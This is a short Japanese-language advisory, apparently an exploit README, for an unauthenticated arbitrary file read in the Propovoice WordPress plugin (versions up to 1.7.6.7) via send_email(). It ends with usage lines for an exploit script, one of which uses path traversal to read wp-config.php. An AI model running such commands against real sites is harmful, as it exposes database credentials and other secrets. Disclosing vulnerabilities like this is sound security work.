
Propovoice <= 1.7.6.7 - 認証不要の任意のファイル読み取り
Propovoice <= 1.7.6.7 - 認証されていない任意のファイル読み取り
Propovoice: All-in-One Client Management System WordPressプラグインは、バージョン1.7.6.7以前のすべてのバージョンにおいて、send_email()関数を介して任意のファイル読み取りが可能な脆弱性があります。これにより、認証されていない攻撃者がサーバー上の任意のファイルの内容を読み取ることができ、機密情報が含まれる可能性があります。
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php